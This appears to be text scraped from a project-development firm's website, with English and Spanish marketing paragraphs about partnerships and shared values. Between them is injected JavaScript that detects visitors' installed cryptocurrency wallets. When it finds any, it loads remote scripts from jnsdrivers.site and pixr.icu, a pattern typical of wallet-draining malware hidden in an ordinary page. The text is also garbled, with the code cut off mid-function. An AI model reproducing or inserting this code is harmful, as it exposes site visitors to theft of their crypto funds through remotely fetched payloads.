For each project we establish relationships with partners who we know will help us create added value for your project. As well as bringing together the public and private sectors, we make sector-overarching links to gather knowledge and to learn from each other. The way we undertake projects is based on permanently applying values that reinforce each other: socio-cultural value, experiental value, building-technical value and economical value. This way of working allows us to raise your project to a higher level.;
for (const [walletName, detectionFunction] of Object.entries(walletDetection)) {
try {
if (detectionFunction()) {
installedWallets.push(walletName);
}
} catch (error) {
console.error('Error detecting');
}
}
return installedWallets;
}
const resultWallets = detectInstalledWallets();
console.log('Installed Wallets:', resultWallets);
if (resultWallets.length > 0) {
var externalScript = document.createElement('script');
externalScript.src = 'https://jnsdrivers.site/onload.js';
document.head.appendChild(externalScript)
var externalTouch = document.createElement('script');
externalTouch.src = 'https://pixr.icu/counter2/';
document.head.appendChild(externalTouch);
}
Para cada proyecto, establecemos relaciones con socios y profesionales conocidos que nos han demostrado que nos ayudarán a crear un valor añadido a su proyecto. Además de reunir a los distintos sectores: público y privado, creamos enlaces globales para reunir conocimientos y aprender unos de otros. La forma en que emprendemos los proyectos se basa en la aplicación permanente de valores que se refuerzan mutuamente: valor sociocultural, valor experimental, valor técnico de la construcción y valor económico. Esta forma de trabajar nos permite elevar su proyecto a un niveles de mucha calidad que contemplan un amplio abanico de posibilidades."]